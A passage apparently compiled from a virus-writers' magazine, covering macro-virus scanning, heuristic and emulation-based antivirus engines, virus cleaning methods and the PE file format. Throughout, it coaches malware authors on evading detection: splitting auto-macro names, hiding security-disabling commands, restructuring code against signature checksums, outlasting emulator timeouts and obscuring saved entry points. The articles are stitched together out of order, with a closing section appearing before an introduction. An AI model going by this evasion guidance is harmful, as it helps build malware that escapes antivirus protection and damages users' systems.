Macro world Microsoft offers many virus-friendly enviroments. During all the history it was this way and another powerfull macro system becomes a new platform for viruses. Yeah, MS Office did it again. First tries to write virus for Word were something like jokes. Most of people hassitated to call it virus, "self-spreading macro" was most obviouse definition. But today everyone call it a virus, and there are realy many of them now. One may guess there are even more macro viruses (or other script viruses) appears monthly than "regular" viruses. Scanners have their life more complicated once again. Microsoft keeps "structured document format" documentation for themsefs claiming: it is a internal format, you don't need to know about it, just use our programming interface. However, Microsoft's interface doesn't allow enought to scan for viruses in macro area. Avers had to find out document format by themselfs. Many of them weren't able to do it for a long time (until third-party documentation appears). Because this format is up to twice fragmentized, and moreover fragmentation definition can be fragmented as well. Scanning macros was so unusual for avers, so some
antiviruses scanned whole files (funny, if virus body scanned for can be fragmented too - and they are not able to catch fragmented pieces), or even specialized antiviruses appears and were rather successful at market - like F-Win or HMVS. From virus-maker's point of view there is no more needed than to understood macro commands. But avers has to do much more. Microsoft's document format can be encapsulated in other formats and it is needed to scan them all (like MS Excnage's folders, etc). Once they have reading routines to access macro area, a regular scan-strings can be used. Some of first macro scanners just scanned from names of macros, but it is outdated today. Scan-strings are really relieable. However, or polymorphic macro viruses things are more complicated. For these reasons and again - to catch new viruses appearing every day, a heuristic scanners appears. They are based on dissassembly of macro code (accessing macro area and walking through instructions, finding unusual and/or suspected instructions or combinations). For macros heuristic is much more reliable as instruction set is much more limitied, there are no registers or widely accessible memory, etc.
Closing Congratulation if you read all the things above. Hope it was not boring, and it helps you some way. The main thing I tried to present here is you have to think, not plagiating other viruses, not doing all viruses same way one right like another - but to show you that you have to understand scanning methods in order to write better viruses. Because the more your virus complicates life to the avers, the more it is successful. If you can write something that completly beats currently used methods, thats the best. I can give an example of slovak viruses like Dark Paranoid, or TMC:Level_42, or let's start with german virus Tremor: its nothing unusual except after it was detected by avers and added into scanners - it permutates (changed usual schema) and old samples weren't caught by antiviruses again. Or Dark Paranoid: as they weak point of stealth viruses is their presence in memory (and they can be detected there easily), Dark Paranoid is encrypted memory, having polymorphical handler of single-step interrupt to encrypt only one instruction beeing executed. In this way Dark Paranoid can't be caught in memory by simple scan-string, it can't be caught in files once it is stealth. Or TMC, that stands for Tiny Mutation Compiler (well, linker actually) is able to permutates its own instructions placing them in random order, connecting them with jumps and contitional jums and finally relocates all memory access instructions and jumps. Scan string for it can't be choosed as it can be broken after every single instruction. Moreover, in files it has only permutator and linker stored with data used to constructuct and link whole body (not a instructions) - and it takes really long even to emulation heuristic to construct whole virus and to test it. These are examples of non-traditional thinking. Find your own way, break the limits of current point of view this way you can efectively beat avers - that they affraids most of all: they can't change principles of their scanners every day. Think of it... flush
In this article I would like to introduce my own view to scanning technologies for macros used in most common antiviruses.
Structure of WB6/VBA The first thing you have to understand is how macro is stored in file. This is probably the most important reason why is scanning doing the way it is done. So let start. I will assume you know something about VBA (visual basic for applications), what is the most common language used for macros. I would like to focus to VBA, because it is more common than WB6 (word basic 6). VBA project is stored in its own folder. (you can easy take a look at it by using dfview - suplied with DevStudio). Each macro is stored in stream with a bit complex structure. Before macro is written to file it is compiled by built-in compiler to something like a stackmachine language. So a = b + c is something like this: push b push c add pop a
; ; ; ;
put put pop pop
b to stack c to stack b, c and put it's summary to stack value and set a to it
Variables and function names are usually located in dictionary so it is a bit difficult to find them. In code are just pointers or indexes. Moreover dictionary is not in macro file, so if avir (and many do so) is lazy it just skips them. Other important thing is that jumps and calls are not linked in file so it is a bit difficult to trace code flow. Anoter aproach to scan VBA is to decode "source" suplied with macro. In this case avir have full source of code (with all names and so on), so it is enough to skip some headers or something more and CRC it. WB6 is much simplier in structure. It's code is stored in tokens (?), where each token has exact meaning. For example space, +, -, SomeFunction, number, variable, and so on. So it is rather difficult to write emulator of this language. I don't like to waste time with this, so some example (the same case as I used for vba): variable operator variable operator variable
"a" '=' "b" '+' "c"
and some function: internal function MacroCopy string "my_macro" operator ',' string "new_macro"
As you could easy find out this structure is very simple and that probably caused that most recent technologie is CRC.
Scanning Number of macro virii is growing day by day. This is a reason to use automatic systems to extract signatures.
Because they were coming with WB6, and WB6 has very simple structure, it seemed that CRC is the best. It is "absolutely" exact - so it can recognise sub variants, it is fast and easy to implement. May be it seems silly, but it was in days when everybody trusted that polymorphism in macro is not possible (what a mistake :-). So scanning algorithm is something like this: CRC all macros and check in database. Look at macros you found and if they describes whole variant virii is identified exact. If something is missing and I think it is enough: possible virus. You can see even now the legacy of those old good days. Many variants are differ just in one tab or space after end of macro. CRC rulez... Suddenly polymorphic ones came to the light of world and CRC became not very efficient. Became not but it is very comfortable to just run some program on your collection and to have signatures. The simplies way you can see is just to modify CRC algorithm. In those days polymorphism was when name of variable changes or something like that, so why not to skip whitespaces or variable names. And this is probably the final solution. So called smart-crc. Because of structure of VBA you can afford to skip variable names (and it is even more comfortable - who will search for it in tables). The structure of code is stored in code. It is enough to check the structure. You can easily see that macro is doing something like ? = ? + ?. And this is enough. With this technique you can identify at least 90% of current virii. Finally if you want polymorphism you NEED to change the structure of code. For example swap lines or add garbage code. And automatic AV technologies will be smashed to do ground. The next and very old way are scanstrings. It is easy to implement scanstring like scanner for macros. This may be exact because you can follow either structure of code or names. For example you may be looking for: ToolsMacro .Name = something with .Edit
These are two very easy to implement but efficient in use methods.
Some word about heuristics The main problem of macro virii is that there doesn't exist non virii macros (in fact they are very rare). So AV are not anxiety about how to detect, but how to distinguish between variants and how to find out macro is not virii :). It is easy to follow functions macro is using, so write a macro virii heuristics is easy. There is not problem to say: "this may be macro virii", because you can easily find "ToolsMacro .Edit", "Organizer .Copy" and other shit macro must be dealing with. In fact it is not enough. There are many legal self-installing macros using macro copying functions. In virii you can find usually somthing special ... Very important flags for heuristics may be: There is reference to AUTOMACRO in code (or macro itself is auto) (so it is clever to build macro name from substrings not containing whole macro name) There are common commands and constructions like ActiveWorkbook.Modules and so on (try to avoid very common constructions or use Set to substitute a part of command that is a bit hard to simulate) Bevare of construction like ...VirusProtection=0 (at least don't use value after command, it may be more visible for heuristics) Because structure of VBA is a bit more complex it is hard to simulate it. In fact all heuristics i know about are passive (it means they are just searching for something) and i don't know about any big advantages in more complex analysis. In fact simulate whole macro is difficult task - try to write whole VBA... I have heard someone emulates variables, but i don't believe it. And i am almost sure there is no full emulator of vba. So something like this a$="tomacro" b$="au" c$=b$+a$
is hardly ever suspicious for scanners. And I can't imagin that this can be suspicious: .... a$="" b$="" 10 c$=b$+a$ if c$<>"" goto 20 a$="tomacro" b$="au" goto 10 20 ....
Of course this is silly example, but i like to point that without code following emulation it is useless to have emulation of variables. And you may use as many jumps as you want or even functions, cycles or something even more evil. If you want to make day of aver harder just assign variables way that they can't be simulated from top to down. It means use goto to turn back with new values and heuristics will have to be much more complicated. So that is all i want to say ....
Hello, that's me again, if you didn't get bored of me before. Originally this part was supposed to be written by another famouse coder, but he did not do that due to beeing short of time. Unfortunately, I'm much much shorter of them than him. But never mind: we are going to aim at heuristical principles in a short articles, but be sure to read also main articles about antiviruses. The main reason of heurisics is, as I already mentioned, to detect unkown viruses as many viruses appears every month and it becomes difficult to keep track of them. First it was introduces by F-Prot (well, some kind of, a bit hard to say if we can call it heuristic) and first real implemantation in well-known TBAV. At first, we should define what heuristics exactly is, I try it by my own: heuristic scanner is a program (antivirus, more exaclty) that is able to detect viruses by analyzis of their code - what they do. But to decide if the given code is a virus or not isn't easy even if it can look like it is - it is difficult to made it reliable. If you have a look on viruses, the code they use, if you have a look on many many viruses, like avers did, you can easily tell the things that are common for all the viruses. This are the beginings of heuristics - F-Prot used something that was called in av-community "heuristics scan-strings". A short scan strings, searched in whole body, of these typical constructions: like write command which is typicaly mov ah, 40h; mov cx, 1234h (size) ; int 21h. This is of course only illustration, this can be done in many ways, but not that much to have most of them factorized (using wild-card scan-stings). If several of these scan-strings are found, you can say there is probably a virus. But many regular programs written in assembler looks this way and not to have false possitives it is required to hit many of these strings to report a possible virus infection. Some avers trusted to f-prot's reports of possible viruses, but presented form wasn't quite reliable and moreover, it was not able to detect more comlpicated pieces as it was set-up-ed to low sensitivity.
TBAV ruled the world for a short time at least. Franz Heldman presented a brand new technology called heuristics in excelent look. (but only for a first look). For a first look all stared in amazement: avers because they even never think about such a things (many of them are only doing their work without real invetions), and vx-ers because it was able to detect even viruses they are going to write. But reallity was a bit different: avers for a long time didn't count TBAV's heuristics into scanning methods at all, they reported heuristics as not reliable (mostly because they weren't able to replicate this technology even in simple look as TBAV has). Virus writers started to find a ways how to fool TBAV (as soon as they stopped affraid of it). Let's see how TBScan works: it uses passive heuristics (structured dissassembly) to analyze instructions. Main aim was as before - to detect usual code-sequences found in viruses. Tbscan marked them with letters by each file, and there were so many flags during years of development of tbav that covers whole alphabet plus some other characters. Starting from entry-point Tbscan checks instruction by instruction judging them and marking known code-sequences. But thats not enought, for sure. Also jumps are followed and on conditional jumps both paths are disassembled. However, as dissassembly is done in single-pass, a simple tricks that breakes intructions, etc can make tbscan to loose its track of code. Also it is easy to fool tbscan by doing the things in non-usual way or indirectly. As it disassembles the code, even simple mov ah, 3f; inc ah were enought to do so. Tbscan also has many false possitives due to its not-fully relieable technology - when tbscan lost track of codeflow (that happens quite often) it detects many flags on garbage code it finds. There were a quite long database of files that are known false postitives - some kind of anti-scan-strings, if found, heuristics is not
performed on such a file. TBAV's main weak point is it is so clear for everyone - even for virus writers they may easily guess how it works - and how to avoid to be caught. As soon as TBAV becomes popular, neartly everyone started to exclame their features they are tbav-proof. All is needed, during programmig, periodicaly run tbscan to see when it displays its flags. Well, main keypoints to keep tbav far from you is to use good encryption (that can't be passed by tbscan's decryptor), or to do things not as clearly as it is usual. Tbscan detects only usual schemes, so simple tricks like and-s, add/sub on comparing will work. However, tbscan is out of game today. There were also some plagiats, a german 'Suspiciouse' (as I remember), but all they went as unsucessful as tbav.
To fix these disadvantages it is possible to partialy find out the values of registers by semi-emulating of piece of code before key instruction (e.g. int 21). Only registers are emulated and memory access only for reading (not to damage memory). This is used for example by active heuristic scanners to analyze code they can't reach (we can call it local semi-emulation). In this stage doing mov/inc will not help, but doing rot-s or and-s instead of comparing will sure fool this alorythms.
Improoving heuristics - emulation There were a lot of big words how to do heuristics in real way, to do the things as they really are in file, but not runned. Someone may guess a single-stepping might be used, but in reality it weren't ever used for it. It is equivalent to running each file, but checking what you are executing. But your automatic debugging (its somesthing like it) can't be used due to many protective envelopes that are designed to crash debugers. In other words single stepping was never used for active heuristics as it can crash several times on a hard disc files per scan. I remember, for example, dedicated scanner for EMM1:Level_3 that uses single-stepping. It hangs several times in my utilities directory, runs many files (even pkzip), etc. In fact, only emulation can be used for active heuristics - that is to check for is file exactly doing, and to decide if it is viral code or not. In this point of view, there are two primary objectives. First one is a bit like before - to find out suspective code constructions, but it is less important now. The more important is to monitor activities that are really done. Let's imagine what virus usualy do - it tests something, becomes resident (if it is a resident virus), and infects files on some certain activity in system. Well, and for example becoming resident can be easily caught by active heuristics even if it is done in unreadable way - because it detects direct modifications (let's talk about dos now) of 0:[413] or MCBs. But what really defines a virus is a infection of other files - if emulated program searches for executables, modifies them (in order to replicate) it is virus nearl for sure. If virus only installs itself into memory, a simple tests are run in virual machine - a file is runned (and checked for infection), or opened for r/w, or opened on removable drive (likely copied to floppy). This usualy notices any virus. Now you can surely guess some tips how to fool them. But we have to continue: Because active heuristics is not 100% stable, there is usualy still engine for searching of typical constructions with local semi-emulation (mentioned before). Capabilities of virus can be detected also this way - even if they may not appear from the first view (or emulation ;-) Now have a look at limits of emulators - this is primary subject to be undetectable by active heuristics: there is virtual machine. Its main advantage and disatvantage at the same time. Of course, it is not V86 virtual machine you probably think, but emulated computer: it usualy has low memory (depends on implementation, even dos memory can be rather low!), i/o ports are not working - some very-very popular are emulated, but no more - because emulater can't allow to emulated program to write to ports, it can't guess real life of connected devices i.e. playing with some ports might cause emulator to loose track. Also, even emulated ROM might be writeable (but don't try it, because it can be real memory-mirrored ROM ;) Most of interrupts are not functional or are functional only in limited way. Int 21 and int 13 are of course
emulated as much as possible - because it is way of detection, but less known functions on int 21 possibly will not work (as well as other interrupts) Hardware interrupts are not functional. For some purpose the most usual - irq 0 (int 8) is possibly emulated, but for sure not with same periodicity as in reality, because emulator is much-much slower Thats also important - slow emulator is a very seriouse limit - users don't want to spend all their life by scanning disk and thats why emulation is time-limited (or by time, or by number of emulated instructions). For this reason emulation have to be aborted on timeout too (for this reason there is also usualy some dynamical adjust of lenght of emulation - if a very suspicious actions are found, more instructions are emulated). But timeout must be there, because emulator is not 100% functional (can't be by its definition) any many regular programs might crash or stay in infinite loop. And if it takes you really long to do real viral actions, emulator will abort on timeout sonner than it noticed your activity. (don't perform actions directly - no fast infection - that's not a feature, but a bug! wait a bit, be less deterministic) There might be bugs in emulator - but most usual instructions are working for sure. You may try some less usual and undocumented (like undocumented versions (aam), instructions not in matrix (sal and others), etc) but many of them are cpu-dependant. Moreover it tooks few minutes for avers to implement new instruction (if it is some easy one). Also you may test some memory wraps (oversegment and global memory wraps might not work, if they are computing adress lineary, SIB clipping might not be handled correctly), test if A20 mapping works. Also we are all 32-bit now: you can use 32bit registers, 32bit access and 32bit access modes. There may be sill bugs in 32bit opcodes, or they are not working at all There are also loading limits - because whole file (imagine 500k) can't be loaded and emulated - tooks too much time. Only a some part of file is loaded to memory and you can test it in some way. (like using host data as crypt-values). Enviroment is more-less static, interrupts are not really emulated (tooks too long to emulated whole int21, loading from fat, etc): as int instruction is emulated - it returns values depending on inputs or doesn't emulate at all (less important). Int chain is emulated (usualy) only if it is redirected - until it reaches dos entry. You can check if your interrupts are really passed to dos and processed. You can use some anti-trace tricks (all you sure know some), but good emulators can trace through anti-trace envelopes of other programs, so it will possibly go even through such a tricks Do the things less clearly, if your virus is clever enought not to be caught on very first executed exe-file, you have to be undetectable by passive part of heuristics as well (searching for instructions) ... try to imagine other limitations - because all is done by emulating you can surely guess others: emulation is slow, buggy, speed and size limited, and very incomplete. Currently leading heuristic scanners are NOD/iCE32 and Dr.Web - both of them are using mentioned technologies (with also mentioned limitations), but only for dos executables (how lucky). At the present time, none of them has 32bit emulator (I mean not written in 32bit, but fully emulating 32bit) and thats why they can't perform active heuristic for Windows executables (PE/LX), and viruses for windows are not that much affected by their heuristics power. For 32bit Win executables they are using only passive part - i.e. disassembly and searching for suspicious code constructions (typical viral sequences). These two antiviruses has much less false possitives, as they need exact actions to judge the file as infected. (but they uses anti-scan-strings as well, because there are always false posstives). But the most amazing thing uppon them is quite detailed description they report for infected file (especialy by NOD) - they can find out if virus infect boot as well as com/exe files, if it infects sys files, if it is resident, stealth, polymorphical, etc. You can nicely see it on NOD/iCE in which the scan-strings can be turned of to use only a heurisics. The hitrates running heuristics-only are quite impressive.
Other heurisics scanners There are of course some other heuristics scanners in the world, but less important. AVP has a kind of active heurisics too, as it is part of generic decryption engine AVP has. But as AVP is the highest-standard antivirus in the world and it has really lots of scanstrings, its heuristics can be set-up-ed for lower sensitivity which also brings less false possitives. Heuristics is also less visible, because it reports unknown virus really rarely. Simmilar situation is for Dr.Solomon's Toolkit (not Solomon's any more, of course). In our tests we modified toolkit's viral databse not to have any scanstrings to test heuristics only. Result was as expected: less than 70% (slightly vary). You really don't need to affair of this heuristical engine, if you can beat those mentioned above. Solomon added only some very easy one (like AVP) to have some less hitrate also on unknown viruses. But Solomon's policy in scan-strings was to add anything, no matter if it is a virus - so they have a biggest hitrates without any thinking of it (this is why I don't like it). The worst heuristical scanner I know is AVG, time ago it has same weak point as Tbscan has, even more - it shows emulation process (with optional step-by-step confirmation) and you can see code and registers - and easily test the bugs in it :) It was showen only to impress audience, because it was really buggy and useless. It was several times improoved, but without reasonable result - first versions were extremly slow and buggy. Afterwards, they used new scanning/heuristical core (developed by someone else who joined their team) which is a bit faster and better, but still pretty weak. To finish a overview of others I have to mention NAI as well. But it is rather easy to accomplish, because NAI has no own technology (or really very little - only some programmers that downgrade buyed technology by putting it together with others). NAI buys anything that can be buyed, currently as far as I know they are using engine of dr.solomon with roughly same capabilities as dr.solomon. May be they'll try to buy another heuristical scanner... Who knows...
Heuristical cleaning Now we are in second, more-less important chapter of this article. Heuristical cleaning was firstly presented by TBAV, program named Tbclean. But at first we have to explain what heuristical cleaning is: a cleaning of virus from file without knowing virus exactly, just by tracing it or more complex automated analyzis. But heuristical cleaning is less important than scanning, because it is much more reliable and also much less used. Moreover, the hitrate is analyzed in test-tables, not these high-tech features. Tbclean performs it in most easy way. As TBAV was lack of emulator engine, Tbclean uses single-stepping to trace program. You can surely guess it will not work in many cases. Of course - it crashes (whole computer) on protective envelopes, and sometimes also on usual programs. But it sometimes works. Principle was simple tracing virus, because virus when it does usual things, reconstructs host body and passes control there. Idea is to allow reconstruction (but disallow instalation, if possible), and on jump to host body make a snapshot of reconstructed file. Passing control back to host was detected by jumping (or ret or whatever) to offset 100h (for com's), or far-jump (retf respectively) for exe files. Nearly every virus ends this way. All is needed is to write image back to disk and work is done (it is verry simmilar to exe-unpackers with tracing). To prevent instalation, tbscan for example returns for GetDosVersion call version 2, that most of viruses refuses. Simple and effective. But there were (are) also many other tricks. Some of them you may guess if you want to write simmilar cleaner: prevent of some instructions (like cli, i/o ports, hard stack modifications, filter interrupts (they are redirected not to be accidentaly infected - int21 for example usualy returns error (carry set)). Big problem it to find out where to cut-down the file. File can be easily reconstructed, but cleaner don't know where to cut it. There are several possibilities: Cut it on entry point (sounds good, but will damage files if virus doesn't puts itself at the end). (tbclean always do this - thats why it can't clean Commander Bomber for example) Leave it as it is. (works almost everytime - but there is still inactive virus body, and some stupid
antiviruses still might detect it) To guess virus infection type and virus size (much more complicated, only some of newer cleaners do this) Tbclean was first and really simple and buggy. It crashed very often, in many cases reconstructed file was corrupted, and moreover - as it becomes pretty famouse there were tricks like in virus Varicella, that was really executed whey it was cleaned by tbclean (this virus mades Franz Heldman really angry ;) But in these days it is forgotten as well as whole TBAV.
Emulation makes it reliable Yes, thats right. With a new generation of heuristical scanners (Dr.Web and NOD/iCE), there are better possibilities to clean file - and not to crash. Principle remains the same - emulate virus as much as possible, to find out as many information as possible. This is some deep heavy woodoo magic of avers - thats why only really few of them can do this. Of course, much better is exact disinfection which is much more valueable (like AVP has), but to impress us (vx-ers) and other avers, this magic is here ;-) At the present time, however, it is functional enought only in NOD/iCE (pretty impressive, but due to mentioned limitation of their emulator it doesn't work for 32bit files (win)). Heuristics cleaning is also used in AVG, but I would say the same as to their heuristical scanner: it was really poor time ago, and after upgrading core it is still not enought. Finally, there is Dr.solomon (which is also used as core engine in NAI's now) but it doesn't perform generic cleaning at all (I mean cleaning unknown viruses). As far as I have informations, it is only used to disinfect virus that are possitively known as cleanable. Thats why you will not notice a heuristical cleaning at all. Reffering to things above, I will focus primarily on NOD/iCE as it uses imho best technologies of all mentioned. Generic idea is same - to emulate virus to allow him reconstruct host file, and use retrieved infromation to repair host. All is done in emulated virtual PC, with emulated disks. The simpliest way of disintection is to save reconstructed file and to cut out virus. As there are several types of appending virus to file, it might slightly differ on technology how to cut it out. Clever technology, if virus works fine in emulator, is to virtually infect several virtual files (goats) to find out size of virus and where the virus is stored (by diffing with original file). This way they may guess nearly exact the infection methods of virus. For combined boot/exe/com viruses, as they are usualy installing itself to mbr, a virtual reboot is done to activate them in virtual pc after they installs into virtual mbr. (oops, so virtually ;) After guessing the size and knowing where virus stores itself in file, a real infected file might be run (virtually, again) to repair host, find out entry-point, and cut it using informations retrieved before (if they are not available, some alchemy is done or virus body is left there). This way it looks simply, but isn't. I guess heuristics scanning and heuristics cleaning is top high-tech technology avers are using now (also reffer to my overview of antivirus methods). Even if the principles and ideas are simple there is lots of things to be done to make virus work in virtual pc, so the complications you might prepare for heuristics (cleaning especialy) might be awarded by your success. Good luck! flush
Well, dear virus friends, this article may be a little bit unfriendly, but, our mag is an open forum. And besides, we do not have CDA (now after couple of week i don't know what stands this for). The main goal of this article is just to show our vx community, how easy can be our viruses removed, when necessary.
AV Companies There is a shitload of viruses and virus strains around, and many of them are "In the wild". Estimated virus count is about 20000+ and we also have more than 3500+ macroviruses. It is not likely any AV software can succesfully detect all the viruses. Nor they can remove it all. But they are at least trying it.
A. Overwriting viruses These viruses are basically uncleanable. No doubt. This category of viruses is lame. And lameness of this virus type is also the reason, why the infected files cannot be cleaned to their original state. They can be deleted, renamed, but the only way to restore infected files to their original state is the use of backup copies (if they exist).
B. Non overwriting viruses. This type of viruses can be removed in up to 100 per cent of cases. The reason is the virus of this category has to launch the host in some monent. In this specific point of time, the host file is rebuilt in that way, as if it was not infected, or better the file is executed as not infected. But, let's take a closer look on every type of non-overwriting viruses.
B1. FILE VIRUSES 1. Companion viruses This type of viruses takes advantage of priority of launching executable files with the same name but different extension. Sorted from highest to lowest priority, the files are launched in following order: 1. com 2. exe 3. bat The virus simply creates file with the same name, but with extension having higher priority, containing the copy of virus, or changes the file extension to one with lower priority and writes the viral into the file with original name and extension. As the virus doesn't modify the infected file in any way, it is trivial to remove the virus. The structure of the file can help to determine the original file extension. Any file, starting with obvious 'MZ' or 'ZM' is handles as EXE file by the system, when having specific minimal lenght. This limit seems to be 26 bytes. Following code db
'MZ'
db int
21 dup ('A') 20h
exits without any problems, but when you replace second line with db
22 dup ('A')
you get nice message "Program too big to fit in memory". Thus, first remove the file with viral body. Then check the file structure and of the file with the same name and rename it back to original extension. And bingo. 2. Linking viruses (DIR II and its kind) This type of viruses takes doesn't change anything in infected file. It just link the starting cluster of the file to the viral body located somewhere on the disk. Main symptom one can see if lot of cross-linked files all around the disk drive. To "clean" this kind of virus one need to link back the strating cluster of the file to the original. And do not forget to remove the virus body from the harddisk. For information considering FAT 32 take a look at great article A fool named FAT 32 by flush. 3. Com viruses Basically, there are two types of COM viruses. The first type uses the "classic" way to receive the controll. It writes to the beginning of the file jump to the virus body and saves the original bytes somewhere in virus body. JMP virus E9 xx xx
Rest of them program virus:
Virus body Original bytes
To remove virus of this kind, is necessary to locate in virus body original bytes form the file start and restore the start of the file. Then the file is it was before infection (but still contains the viral body). Last step in the process of removing virus is to cut the viral body. In most cases can be used as the best for cutting the (xx xx)+3 position, where xx xx stands for the size of initial jump. In most typical case whole body of the virus is removed. In some rare exceptions the file will contain some bytes of viral body. Second approach is more complex. The virus body is written to the beginning of the file and the rest of the file is just moved behind the virus body. On execution the virus moves the file to its "normal" position and launches it. Virus body
Program moved up
The solution of infection is very handy is this case. All the Averz have to do is to move the program to
the beginning of the file. Nothing less, nothing more. As possible "D-fence" can be used combination of both infection methods above. But the removal still will be very easy. 4. Exe viruses Typically, exe infecting viruses appends the viral body to the end of the file and then virus modifies EXE header in order to launch virus before the infected file. EXE header CS:IP
Program
Virus body
It is sure somewhere in the virus is stored at least original value of Exe_CS and Exe_IP, optionally also Relo_SS and/or Relo_SP or even the whole original EXE header. Virus is removed in following steps. At very beginning the Exe_CS and Exe_IP are located and their values are restored. Optionally are restored also Relo_SS and Relo_SP. Then is necessary to compute values of size of the file in pages and store this two words to offsets 2 and 4 in the header. Now it is possible to save restored file header to the file. And last step is the cutting the file to its original size. If the virus contains whole original header (as most of the steatlh viruses do) is the removal of the virus easier as described above. All the cleaning is about is to locate the original header inside the virus and save it to the offset 0 in the file. Then naturally Avers cut the virus body and .... Done ! Well, exe files, the above stuph was all about the DOS times. Now is the PE file the target. And removing of virus infections here can be even easier. If the bad Aver is really lazy, all he need to do is to skip the virus. In other words, he has to set original RVA entrypoint on the file. He doesn't need to care with viral body or added section. So dudes, in order to make their task harder, do some unusual operation with the saved bytes necessary to hand over the code flow to the infected host. 5. Sys viruses Device drivers are the rarest target for viruses. Since Dark Angel published his tutes, everyone can infect *.sys files. The trick is simple as hell - it uses the feature of SYS philes - chaining of the SYS files. All we need do infect a SYS file is to add the necessary code to the host and just change the first dword of the file to point to the header of our new character device. So easy it is. So is the cleaning. Very lazy Aver can assume something in the way there is always only once driver in SYS file. The procedure of cleaning is then take a word from offset BOF+2 in the file lseek to that location cut here the file lseek to BOF write this 4 bytes: 0xFF 0xFF 0xFF 0xFF to the BOF They could also take a more optimised way: to transverse all the headers, till they found a last one. This is beginning of the virus, so cleaning is easy then.
B2. Boot viruses Boot virus occupies MBR of the hard disc or boot sector of the drive. In most typical case, the virus stores "somewhere" on the infected media also the original, uninfected MBR or boot sector. To wipe boot virus is very efficient to use the sector with stored MBR/boot sector and to restore its original location. Another method is to use of some kind of generic MBR/boot sector, when original in not available. To try to fuck up with the averz, all you have to do is not to allow a clean boot. Could be arranget with a little bit phantasy and code ...
B3. Macroviruses As for the macroviruses, there is a very simple workaround - all you have to do is to delete macros. Sure, this is not the best solution, but quit reliable. You have no macros, viral as well as non viral. Non viral macros are let's say casulities of the war.
B4. Multipartite viruses Basically these viruses have multiple targets of infection. Therefore cleaning such a thing is more complex you have to clear e.g. boot sector and the files or documents and philes. Lot of possibilities AVers can do some errors :)))
B5. Special viruses Requires special methods of removing, if the removing is possible. Here belongs also the viruses with some kind of "life insurance", like One_half with its hard disk encryption or Griyo s Implant with its cyclic partition. If some AVer doesn't pay atention to this special method of infection can await a lot of hot line traffic.
C. Closing words AVers due the increasing number of viruses doen't have time to clean all of them. But they are at least trying - so do their job as much time costing as it will be not worth the money.
For the people (and this article is dedicated for them), which have no clue about the thing and for the full coverage. PE (Portable Executable) is format of executable files of all newer Window$. In comparision with now nearly extinct NE species brings PE some substantial advantages. The most important one is the 32-bit FLAT model support. In this memory model the segments (as we know them from DOS or 16-bit protected mode) practically did lost its sense. Every process has its own adress space, we do not need to solve the old problem where to place some piece of code in order not to fuck up (overwrite) another proggy and so on. Due to this feature, can every program decide on its own, with practically no limitations, where it will store whatever it want. If the program wants to have at adress 0x1234567 some wierd string, it can expect the string will be really there. therefore it is not necessary for the program to have relacationa table (but there are some reasons why this table is linked to the program by default). As i mentioned before, segments in such a mode doesn't have any special nor important reason. Program after the start has already set CS, DS, and ES to the segments covering whole adress space (with 4GB size) and the program can access any desired adress. Of course, if the system thinks it it doesn't have access to this adress (if there is something important on this adress [this is not the case under W95 or W98] or there is nothing on this adress) attempt to access such a adress could generate exception. Such exception could be of course intercepted and the lamer at the keyboard will have no clue about it :-)... But this is far advanced for now... As we want have the overview, how the adress space looks like, here it is: 0h- 3FFFFFh 400000h-7FFFFFFFh 80000000h-FFFFFFFFh
reserved, should not be accessed process private area - here are all the sections form EXE mapped shared area - various DLL, VxD and some other monsters
Well, as a kick start it should be enough, let go to the PE itself. PE is format suspiciously similar to the COFF formats used on the Unix systems. It consists of header and the data area which is directly mapped to the adress space of the process. The headers itself are stored before start of code so if you want to find them align address to 4kB and track back to find page starting with 'MZ'. Of course don't forget to set exception handler for page fault. EXE files are mapped staring at adress 0x400000. This starting adress is called ImageBase. It should be no suprise the ImageBase can be set during linking process. When the file is loaded couple of things happens (shit is none of them) 1. headers are loaded into some buffer 2. all the sections are mapped to some space, in order to avoid relocations, ImageBase is preffered. If the ImageBase is not free and the program has relocation table, file is mapped elsewhere and will be relocated. 3. DLL needed by the program are mapped to the process 4. pointers to imported functions are fixed 5. stack is set 6. program is executed (jump to some entry point) note: i don't guarantee the steps above are performed in given order ;-)
As for the DLL mapping this process is similar, but jump to the entry point is not " just jump" but AL holds value which holds information whether library is mapped to a new process and should initialise its global data some proces registred library again but data have been already inicialised (DLL_PROCESS_ATTACH already performed) DLL_THREAD_DETACH = 3 some thread freed library DLL_PROCESS_DETACH = 0 process terminates, library is being unmapped and should terminate its activity DLL_PROCESS_ATTACH = 1 DLL_THREAD_ATTACH = 2
note: most likely calling of library entry point could be disabled by some way note: naturally, library doen't have own stack Due compatibility reasons every PE file starts with MZ header, where at offset 0x3C is dword ptr to the PE header. File is divided in somethink like sectors (with variable size, by default 0x200 - FileAlignment) and file headers (all together, not every one separated) and sections are aligned to that size. This creates some space for storing the virus body (but under 4000 bytes) because on every section we can gain approx. 100h bytes and in the PE files do not use have to much sections. This strategy is used by CIH. As for the structure of the headers, i strongly recommend to see file WINNT.H File header has following structure: struct PE_FILE_HEADERS { DWORD magic; // = 0x00004550 ("PE\0\0") _IMAGE_FILE_HEADER primary_header; _IMAGE_OPTIONAL_HEADER optional_header; _IMAGE_SECTION_HEADER section_headers[primary_header.NumberOfSections]; BYTE dummy[aligned to optional_header.FileAlignment]; };
In the header i would like to point to some positions _IMAGE_FILE_HEADER Machine NumberOfSections
processor, on which the file is able to run I386 = 0x14c name says it all, for dummies number of the sections in program
_IMAGE_OPTIONAL_HEADER SizeOfCode
size of all pages alloceted for code SizeOfInitializedData size of all pages allocated for data AddressOfEntryPoint RVA adress of entry pointu (relative 2 ImageBase) ImageBase starting on this adress all the sections are mapped SectionAlignment alignment of the sections (I386=0x1000) FileAlignment alignment of the file SizeOfImage size in bytes including all headers, has 2 be multiple of object align (allocated for code and data) SizeOfHeaders CheckSum Subsystem DataDirectory
size of headers (including all section headers) checksum - the same as in DOS - ignored this tells the OS wheather it is windowed or console aplication this is a field belonging to the structure containing RVAs and sizes of some important tables
PE code and data are divided to sections. Each section has its description in header. Main purpose of this is to tell loader where in address space should be data stored, how big area should be allocated and what attributes should be set for them. For example code section should start at 4000000h and should be read only and executable. Special attribute for section is SHARED. If section is shared all instances of this program has this sections common. It means if one of them modifies something in section all instances can see it.
Some word of explanation to the RVA (RelativeVirtualAdress). All the complicated operations as e.g. relocation etc... is are performed AFTER the file is mapped to the memory. If we add to the RVA value the ImageBase, we get the pointer directly to the memory adress where the desired piece of information is mapped. Without mapping the problem is much harder, cos we need to search through all the sections and find the one RVA points to. (VirtualAddress
and offset in the file could be calculated as: file_off = PhysicalAddress + RVA-VirtualAddress
And now there are only three problems to solve 1. where should we store virus body 2. how to make our fine virus the supreme commander in the system (aka we_need_to_be_first_on_the_draw) 3. how to call API functions
